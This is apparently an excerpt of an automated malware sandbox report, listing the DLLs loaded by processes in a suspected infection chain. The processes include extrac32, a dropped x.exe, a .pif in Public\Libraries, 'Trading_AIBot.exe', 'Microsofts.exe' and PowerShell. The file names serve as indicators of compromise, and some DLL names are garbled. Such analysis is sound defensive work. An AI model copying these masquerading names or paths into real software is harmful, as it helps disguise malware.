Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
